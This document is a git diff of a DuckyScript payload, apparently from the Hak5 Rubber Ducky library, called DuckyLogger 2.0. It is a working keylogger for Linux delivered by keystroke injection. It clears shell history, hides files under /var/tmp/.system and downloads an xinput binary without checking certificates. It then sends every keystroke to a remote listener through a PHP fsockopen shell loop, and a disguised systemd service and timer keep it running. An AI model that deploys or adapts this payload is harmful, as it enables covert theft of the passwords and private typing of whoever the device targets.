hak5 · dallaswinger · Dec 20, 2023
diff --git a/payloads/library/credentials/DuckyLogger2/payload.txt b/payloads/library/credentials/DuckyLogger2/payload.txt
@@ -1,6 +1,6 @@
 REM Title: DuckyLogger 2.0
 REM Description: Keylogger which sends each and every keystroke of the target remotely/locally.
-REM AUTHOR: drapl0n
+REM Author: drapl0n
 REM Version: 2.0
 REM Category: Credentials
 REM Target: Unix-like operating systems with systemd.
@@ -9,66 +9,111 @@ REM Attackmodes: HID
 REM [Note]
 REM Visit https://github.com/drapl0n/DuckyLogger2/README.md for usage and other important instructions.
 
+REM REQUIRED IP and Port for listener
+DEFINE #IPADDR 0.0.0.0
+DEFINE #PORT 4444
+
+REM REQUIRED URL to download xinput binary - example: https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
+DEFINE #BINARY_URL example.com
+
+REM How long to wait for download to complete
+DEFINE #DOWNLOAD_DELAY 2500
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+REM Do not continue to execute on windows
+IF ($_OS == WINDOWS) THEN
+    LED_R
+    ATTACKMODE OFF
+    STOP_PAYLOAD
+END_IF
+
 REM [keeping tracks clear]
 DELAY 500
-CTRL-ALT t
+CTRL ALT t
 DELAY 400
-STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
-ENTER
+STRINGLN unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
 DELAY 100
 
 REM [creating key logging mechanism]
-STRING mkdir /var/tmp/.system
-ENTER
+STRINGLN mkdir /var/tmp/.system
 DELAY 100
-STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys 
-ENTER
+STRINGLN echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys 
 DELAY 100
-STRING chmod +x /var/tmp/.system/sys
-ENTER
+STRINGLN chmod +x /var/tmp/.system/sys
 DELAY 100
 
 REM [importing xinput]
-STRING cd /var/tmp/.system/
-ENTER
+STRINGLN cd /var/tmp/.system/
 DELAY 100
-STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
-ENTER
-DELAY 2500
-STRING chmod +x xinput
-ENTER
+STRINGLN wget --no-check-certificate --content-disposition #BINARY_URL
+DELAY #DOWNLOAD_DELAY
+STRINGLN chmod +x xinput
 DELAY 100
 
 REM [creating reverse shell]
-STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" >  /var/tmp/.system/systemBus
-ENTER
+STRINGLN echo -e "while :\ndo\n\tping -c 5 #IPADDR\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"#IPADDR\",#PORT);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" >  /var/tmp/.system/systemBus
 DELAY 100
-STRING chmod +x /var/tmp/.system/systemBus
-ENTER
+STRINGLN chmod +x /var/tmp/.system/systemBus
 DELAY 100
 
 REM [creating systemd service to execute payload on boot]
-STRING mkdir -p ~/.config/systemd/user
-ENTER
+STRINGLN mkdir -p ~/.config/systemd/user
 DELAY 200
-STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=always\nType=forking\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
-ENTER
+STRINGLN echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=always\nType=forking\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
 DELAY 100
 
 REM [creating systemd timer unit] 
-STRING echo -e "[Unit]\nDescription= SystemBUS Timer\n\n[Timer]\nOnBootSec=60seconds\nOnUnitActiveSec=300seconds\n\n[Install]\nWantedBy=timers.target" > ~/.config/systemd/user/systemBUS.timer
-ENTER
+STRINGLN echo -e "[Unit]\nDescription= SystemBUS Timer\n\n[Timer]\nOnBootSec=60seconds\nOnUnitActiveSec=300seconds\n\n[Install]\nWantedBy=timers.target" > ~/.config/systemd/user/systemBUS.timer
 DELAY 100
 
 REM [enabling service]
-STRING systemctl --user daemon-reload
-ENTER
+STRINGLN systemctl --user daemon-reload
 DELAY 300
-STRING systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer
-ENTER
+STRINGLN systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer
 DELAY 150
-STRING systemctl --user start --now systemBUS.service && systemctl --user start --now systemBUS.timer
-ENTER
+STRINGLN systemctl --user start --now systemBUS.service && systemctl --user start --now systemBUS.timer
 DELAY 150
-STRING exit
-ENTER
+STRINGLN exit
+